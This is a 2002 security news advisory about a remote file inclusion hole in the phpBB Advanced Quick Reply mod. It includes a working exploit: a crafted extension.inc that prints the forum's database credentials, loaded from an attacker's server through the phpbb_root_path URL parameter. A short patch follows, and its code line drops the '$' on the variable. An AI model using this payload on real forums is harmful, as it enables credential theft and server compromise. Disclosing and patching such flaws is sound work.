Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Code Injection in phpBB Advanced Quick Reply Mod

Code Injection in phpBB Advanced Quick Reply Mod

by Nikola Strahija on November 13th, 2002 It was found a security hole in this sofware (Code Injection). You can download this software at http://phpbbhacks.com/viewhack.php?id=586 Hackers can exploit this Mod to inject some shell code to hack your forum, your website or your server (local exploit) because Code Injection is a dangerous technique of hackers.


Exploit: (quick_reply.php)


if ( $mode == 'smilies' )
{
define('IN_PHPBB', true);
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
include($phpbb_root_path . 'includes/functions_post.'.$phpEx);
generate_smilies('window', PAGE_POSTING);
exit;
}


And you can make a php file which named 'extension.inc' to inclusion to
access that forum. example:

include('config'.'.php');
echo "DB Type: $dbms
";
echo "DB Host: $dbhost
";
echo "DB Name: $dbname
";
echo "DB User: $dbuser
";
echo "DB Pass: $dbpasswd
";
exit;
?>

After that, you upload this file to your server (http://[Your
Server]/extension.inc) and enter URL
http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[Your
Server]/&mode=smiles
You'll be recived all DB Info of forum


Patch: (quick_reply.php)

[FIND]
if ( $mode == 'smilies' )
{
[ADD BEFORE]
phpbb_root_path = "./";


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »